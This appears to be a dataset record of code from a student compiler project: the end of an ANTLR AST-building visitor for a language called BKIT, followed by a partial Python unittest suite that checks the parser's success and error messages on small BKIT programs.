[], self.visit(ctx.children[-1]))\n\n\n # Visit a parse tree produced by BKITParser#params_list.\n def visitParams_list(self, ctx:BKITParser.Params_listContext):\n params_list = [self.visitVar_non_init(x) for x in ctx.var_non_init()]\n return params_list\n\n\n # Visit a parse tree produced by BKITParser#stmt_list.\n def visitStmt_list(self, 
ctx:BKITParser.Stmt_listContext):\n declare = reduce(lambda y, x: y + self.visitVar_declare_stmt(x), ctx.var_declare_stmt(), [])\n stmt = reduce(lambda y, x: y + [self.visitStmt(x)], ctx.stmt(), [])\n return (list(declare), list(stmt))\n\n def visitStmt(self, ctx:BKITParser.StmtContext):\n if ctx.if_stmt():\n return self.visitIf_stmt(ctx.if_stmt())\n if ctx.for_stmt():\n return self.visitFor_stmt(ctx.for_stmt())\n if ctx.while_stmt():\n return self.visitWhile_stmt(ctx.while_stmt())\n if ctx.dowhile_stmt():\n return self.visitDowhile_stmt(ctx.dowhile_stmt())\n if ctx.assign_stmt():\n return self.visitAssign_stmt(ctx.assign_stmt())\n if ctx.break_stmt():\n return self.visitBreak_stmt(ctx.break_stmt())\n if ctx.continue_stmt():\n return self.visitContinue_stmt(ctx.continue_stmt())\n if ctx.call_stmt():\n return self.visitCall_stmt(ctx.call_stmt())\n if ctx.return_stmt():\n return self.visitReturn_stmt(ctx.return_stmt())\n return []\n\n # Visit a parse tree produced by BKITParser#if_stmt.\n def visitIf_stmt(self, ctx:BKITParser.If_stmtContext):\n if_then_stmt = []\n else_stmt = []\n num_of_expr = len(ctx.expr())\n for idx in range(num_of_expr):\n expr = self.visitExpr(ctx.expr(idx))\n if ctx.stmt_list(idx):\n var_decls, stmt_list = self.visitStmt_list(ctx.stmt_list(idx))\n else:\n var_decls, stmt_list = [], []\n if_then_stmt += [tuple((expr, var_decls, stmt_list))]\n else_stmt = tuple(())\n if ctx.ELSE():\n var_decls, stmt_list = self.visitStmt_list(ctx.stmt_list(num_of_expr))\n else_stmt = tuple((var_decls, stmt_list))\n return If(if_then_stmt, else_stmt)\n\n\n # Visit a parse tree produced by BKITParser#for_stmt.\n def visitFor_stmt(self, ctx:BKITParser.For_stmtContext):\n iter_var = Id(ctx.ID().getText())\n expr1 = self.visitExpr(ctx.expr(0))\n expr2 = self.visitExpr(ctx.expr(1))\n expr3 = self.visitExpr(ctx.expr(2))\n loop = tuple(self.visitStmt_list(ctx.stmt_list()))\n return For(iter_var, expr1, expr2, expr3, loop)\n\n # Visit a parse tree produced by 
BKITParser#while_stmt.\n def visitWhile_stmt(self, ctx:BKITParser.While_stmtContext):\n expr = self.visitExpr(ctx.expr())\n sl = tuple(self.visitStmt_list(ctx.stmt_list()))\n return While(expr, sl)\n\n # Visit a parse tree produced by BKITParser#dowhile_stmt.\n def visitDowhile_stmt(self, ctx:BKITParser.Dowhile_stmtContext):\n expr = self.visitExpr(ctx.expr())\n sl = tuple(self.visitStmt_list(ctx.stmt_list()))\n return Dowhile(sl, expr)\n\n # Visit a parse tree produced by BKITParser#assign_stmt\n def visitAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n lhs = Id(ctx.ID().getText()) if ctx.ID() else self.visit( ctx.array_cell())\n rhs = self.visitExpr(ctx.expr())\n return Assign(lhs, rhs)\n\n # Visit a parse tree produced by BKITParser#array_cell.\n def visitArray_cell(self, ctx:BKITParser.Array_cellContext):\n arr = self.visitExpr7(ctx.expr7())\n expr_list = list(map(lambda x: self.visitExpr(x), ctx.expr()))\n return ArrayCell(arr, expr_list)\n\n # Visit a parse tree produced by BKITParser#break_stmt.\n def visitBreak_stmt(self, ctx:BKITParser.Break_stmtContext):\n return Break()\n\n # Visit a parse tree produced by BKITParser#continue_stmt.\n def visitContinue_stmt(self, ctx:BKITParser.Continue_stmtContext):\n return Continue()\n\n\n # Visit a parse tree produced by BKITParser#call_stmt.\n def visitCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n expr_list = []\n if ctx.expr():\n expr_list = list(map(lambda x: self.visitExpr(x), ctx.expr()))\n return CallStmt(Id(ctx.ID().getText()), expr_list)\n\n\n # Visit a parse tree produced by BKITParser#return_stmt.\n def visitReturn_stmt(self, ctx:BKITParser.Return_stmtContext):\n return Return(self.visitExpr(ctx.expr()) if ctx.expr() else None)\n\n # Visit a parse tree produced by BKITParser#expr.\n def visitExpr(self, ctx:BKITParser.ExprContext):\n if ctx.getChildCount() > 2:\n return BinaryOp(ctx.children[1].getText(), self.visitExpr1(ctx.expr1(0)), self.visitExpr1(ctx.expr1(1)))\n return 
self.visitExpr1(ctx.expr1(0))\n\n\n # Visit a parse tree produced by BKITParser#expr1.\n def visitExpr1(self, ctx:BKITParser.Expr1Context):\n if ctx.getChildCount() > 2:\n return BinaryOp(ctx.children[1].getText(), self.visitExpr1(ctx.expr1()), self.visitExpr2(ctx.expr2()))\n return self.visitExpr2(ctx.expr2())\n\n\n # Visit a parse tree produced by BKITParser#expr2.\n def visitExpr2(self, ctx:BKITParser.Expr2Context):\n if ctx.getChildCount() > 2:\n return BinaryOp(ctx.children[1].getText(), self.visitExpr2(ctx.expr2()), self.visitExpr3(ctx.expr3()))\n return self.visitExpr3(ctx.expr3())\n\n\n # Visit a parse tree produced by BKITParser#expr3.\n def visitExpr3(self, ctx:BKITParser.Expr3Context):\n if ctx.getChildCount() > 2:\n return BinaryOp(ctx.children[1].getText(), self.visitExpr3(ctx.expr3()), self.visitExpr4(ctx.expr4()))\n return self.visitExpr4(ctx.expr4())\n\n\n # Visit a parse tree produced by BKITParser#expr4.\n def visitExpr4(self, ctx:BKITParser.Expr4Context):\n if ctx.NOT():\n return UnaryOp(ctx.NOT().getText(), self.visitExpr4(ctx.expr4()))\n return self.visitExpr5(ctx.expr5())\n\n\n # Visit a parse tree produced by BKITParser#expr5.\n def visitExpr5(self, ctx:BKITParser.Expr5Context):\n if ctx.MINUS_INT():\n return UnaryOp(ctx.MINUS_INT().getText(), self.visitExpr5(ctx.expr5()))\n if ctx.MINUS_FLOAT():\n return UnaryOp(ctx.MINUS_FLOAT().getText(), self.visitExpr5(ctx.expr5()))\n return self.visitExpr6(ctx.expr6())\n\n\n # Visit a parse tree produced by BKITParser#expr6.\n def visitExpr6(self, ctx:BKITParser.Expr6Context):\n if ctx.array_cell():\n return self.visitArray_cell(ctx.array_cell())\n return self.visitExpr7(ctx.expr7())\n\n\n # Visit a parse tree produced by BKITParser#expr7.\n def visitExpr7(self, ctx:BKITParser.Expr7Context):\n if ctx.function_call():\n return self.visitFunction_call(ctx.function_call())\n return self.visitExpr8(ctx.expr8())\n\n # Visit a parse tree produced by BKITParser#expr8.\n def visitExpr8(self, 
ctx:BKITParser.Expr8Context):\n if ctx.operand():\n return self.visitOperand(ctx.operand())\n if ctx.LEFT_PAREN:\n return self.visitExpr(ctx.expr())\n\n # Visit a parse tree produced by BKITParser#operand.\n def visitOperand(self, ctx:BKITParser.OperandContext):\n if ctx.ID():\n return Id(ctx.ID().getText())\n if ctx.primitive_data():\n return self.visitPrimitive_data(ctx.primitive_data())\n if ctx.array_lit():\n return self.visitArray_lit(ctx.array_lit())\n\n # Visit a parse tree produced by BKITParser#function_call.\n def visitFunction_call(self, ctx:BKITParser.Function_callContext):\n expr_list = []\n if ctx.expr():\n expr_list = list(map(lambda x: self.visitExpr(x), ctx.expr()))\n return CallExpr(Id(ctx.ID().getText()), expr_list)\n " }, { "alpha_fraction": 0.4645008146762848, "alphanum_fraction": 0.49560749530792236, "avg_line_length": 27.8668270111084, "blob_id": "6c05ae1e5c8e5f7b0fcd345dcca66cc8f32298f5", "content_id": "69b7e8e752db4deabb72357555923512238fb1fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36198, "license_type": "no_license", "max_line_length": 90, "num_lines": 1254, "path": "/Assignments/assignment1/src/test/ParserSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestParser\n\nclass ParserSuite(unittest.TestCase):\n def test_simple_program(self):\n \"\"\"Simple program: int main() {} \"\"\"\n input = \"\"\"Var: x;\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect = \"successful\"\n self.assertTrue(TestParser.checkParser(input,expect,201))\n \n def test_wrong_miss_close(self):\n \"\"\"Miss variable\"\"\"\n input = \"\"\"Var: ;\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect = \"Error on line 1 col 5: ;\"\n self.assertTrue(TestParser.checkParser(input,expect,202))\n\n def test_primitive_init_declare(self):\n input=\"\"\"Var: a,b=1;\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect= 
\"successful\"\n self.assertTrue(TestParser.checkParser(input,expect,203))\n\n def test_composite_init_declare(self):\n input=\"\"\"Var: a,b[3]={1,2,3};\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect= \"successful\"\n self.assertTrue(TestParser.checkParser(input,expect,204))\n\n def test_both_init_declare(self):\n input=\"\"\"Var: a,b=1,c[3]={1,2,3};\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect= \"successful\"\n self.assertTrue(TestParser.checkParser(input,expect,205))\n\n def test_complicated_composite_declare(self):\n input=\"\"\"Var: b[2][3]={{1,2},{3,4}};\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect= \"successful\"\n self.assertTrue(TestParser.checkParser(input,expect,206))\n\n def test_simple_prog(self):\n input=\"\"\"Var: x;\n Function: fact\n Parameter: n\n Body:\n If n == 0 Then\n Return 1;\n Else\n Return n * fact(n-1);\n EndIf.\n EndBody.\n Function: main\n ** this is a comment **\n Body:\n x = 10;\n fact (x);\n EndBody.\"\"\"\n expect= \"successful\"\n self.assertTrue(TestParser.checkParser(input,expect,207)) \n \n def test_composite_declare(self):\n input=\"\"\"Var: x, y[1][3]={{{12,1}, {12., 12e3}},{23}, {13,32}};\n Function: fact\n Parameter: n\n Body:\n If n == 0 Then\n Return 1;\n Else\n Return n * fact(n-1);\n EndIf.\n EndBody.\n Function: main\n ** this is a comment **\n Body:\n x = 10;\n fact (x);\n EndBody.\"\"\"\n expect=\"successful\"\n self.assertTrue(TestParser.checkParser(input, expect, 208))\n\n def test_unterminated_comment(self):\n input=\"\"\"Var: x, y[1][3]={{{12,1}, {12., 12e3}},{23}, {13,32}};\n Function: fact\n Parameter: n\n Body:\n a = a < b;\n If n == 0 Then\n Return 1;\n Else\n Return n * fact(n-1);\n EndIf.\n EndBody.\n Function: main\n Body:\n x = \"\"10;\n fact (x);\n EndBody.\"\"\"\n expect=\"Error on line 14 col 18: 10\"\n self.assertTrue(TestParser.checkParser(input, expect, 209))\n def test_non_body_func(self):\n input=\"\"\"Function: main\"\"\"\n expect=\"\"\"Error on line 1 
col 14: <EOF>\"\"\"\n num=210\n self.assertTrue(TestParser.checkParser(input, expect, num))\n def test_test_nonsemi_stmt(self):\n input=\"\"\"Function: main\nVar: a\nBody:Var\na=1\nEndBody.\"\"\"\n expect=\"\"\"Error on line 2 col 0: Var\"\"\"\n num=211\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n\n def test_non_func_prog(self):\n input=\"\"\"Var: a,b,c;\"\"\"\n expect=\"\"\"successful\"\"\"\n num=212\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_invalid_expr(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a <b;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=213\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n\n def test_khang_testcase(self):\n input=\"\"\"Var: x = \"yay\";\"\"\"\n expect=\"\"\"successful\"\"\"\n num=214\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_invalid_bool_expr(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a <b < c;\n EndBody.\"\"\"\n expect=\"\"\"Error on line 4 col 17: <\"\"\"\n num=215\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_if_expr(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=216\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_var_decl_stmt(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=217\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=218\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_2(self):\n 
input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, b[1]\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=219\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, b[1];\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 26: ;\"\"\"\n num=220\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a = 1, b[1]\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 21: =\"\"\"\n num=221\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, b[1], {12,3}\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 28: {\"\"\"\n num=222\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_params_6(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a + b\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 21: +\"\"\"\n num=223\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_var_decl_not_in_head(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a, b[1]\n Body:\n Var: x=1,a[1]=1;\n If a Then\n EndIf.\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 8 col 8: Var\"\"\"\n num=224\n self.assertTrue(TestParser.checkParser(input, expect, num))\n \n def test_params_7(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a;\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 3 col 20: ;\"\"\"\n num=225\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def 
test_var_decl_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},b=a<c;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 37: a\"\"\"\n num=226\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_var_decl_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=227\n self.assertTrue(TestParser.checkParser(input, expect, num))\n \n def test_var_decl_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If 1 < a Then\n Var: a;\n EndIf.\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n expect=\"\"\"Error on line 9 col 8: Var\"\"\"\n num=228\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_if_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If 1 + a - b * foo() > 1 Then\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=229\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_if_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If a == True Then\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=230\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_if_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If a && True || !b Then\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=231\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_if_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, 
\"asdf\"},a={12,12.e5,True,0x12};\n If a && True || !b Then\n ElseIf something Then\n If something123El_se Then\n EndIf.\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=232\n self.assertTrue(TestParser.checkParser(input, expect, num))\n \n def test_for_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For something Do something() EndFor.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 6 col 12: something\"\"\"\n num=233\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 1, a < 2, i = i + 1) Do something(); EndFor.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 6 col 29: =\"\"\"\n num=234\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = \"abc\", a < 2, i + 1) Do something(); EndFor.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=235\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something(); EndFor.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=236\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 2, a < 2, i + 1) Do \n For (i=2) Do EndFor.\n something(); EndFor.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 7 col 16: )\"\"\"\n num=237\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_6(self):\n 
input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something();\n c = a[23][b[1][2][c]] +. 12.; \n EndFor.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=238\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_for_stmt_7(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something();\n c = a[23][b[1][2][c]] +. 12; \n EndFor.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=239\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_while_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While statement Do something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=240\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_while_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While 1 Do something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=240\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_while_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x =/= y) Do something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=241\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_while_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x && y || b) ** && (a || abc)** Do something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=242\n self.assertTrue(TestParser.checkParser(input, expect, 
num))\n \n def test_while_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While !(x && y || b) && (a || abc) Do something(); EndWhile.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=243\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_complicate_bool_expr(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n a = !(x && y || b) && (a || abc);\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=244\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_dowhile_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While !(abc < 12 || b && True) EndDo.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=245\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_dowhile_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While a[1][c[2]] + 123 -1 EndDo.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=246\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_dowhile_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While 1 <. 2.0 EndDo.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=247\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_dowhile_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While a && bool_of_string(\"True\") EndDo.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=248\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_dowhile_stmt_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While a && b <. 1. +. 3. 
EndDo.\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=249\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_wrong_exp(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e; EndIf.\n EndIf.\n EndBody.\"\"\"\n expect=\"\"\"Error on line 6 col 80: e\"\"\"\n num=250\n self.assertTrue(TestParser.checkParser(input, expect, num))\n \n def test_break_continue(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n Break;\n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Continue;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=251\n self.assertTrue(TestParser.checkParser(input, expect, num))\n \n def test_return_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return ;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=252\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_return_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return 1 + 1;\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=253\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_return_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return 1 + {{1,2}, \"abnd\"};\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=254\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_return_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n 
If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return (a < 1) || (b >. !c);\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=255\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_return_stmt_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return a < 1 || foo(arg1, \"arg2\", {1,2});\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=256\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_return_stmt_6(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return If a > b Then a + 1 EndIf.;\n EndBody.\"\"\"\n expect=\"\"\"Error on line 9 col 15: If\"\"\"\n num=257\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_1(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=258\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_2(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing))\n EndBody.\"\"\"\n expect=\"\"\"Error on line 5 col 8: EndBody\"\"\"\n num=259\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_3(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a[c[1][b]][1] + foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=260\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_4(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a[c[1][b]][1] < foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=261\n 
self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_5(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing)) = something(foo());\n EndBody.\"\"\"\n expect=\"\"\"Error on line 4 col 39: =\"\"\"\n num=262\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_6(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), {\"asdab\", {1,2.e2,123e1,\"nothing\"}});\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=263\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_7(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), {\"asdab\", {1,2.e2,123e1,\"nothing\"}});\n printLn();\n print(arg);\n printStrLn(arg);\n read();\n EndBody.\"\"\"\n expect=\"\"\"successful\"\"\"\n num=264\n self.assertTrue(TestParser.checkParser(input, expect, num))\n\n def test_call_stmt_8(self):\n input=\"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), {\"asda\\\\bb\", {1,2.e2,123e1,\"nothing\"}});\n printLn();\n print(arg);\n printStrLn(arg);\n read();\n EndBody.\"\"\"\n 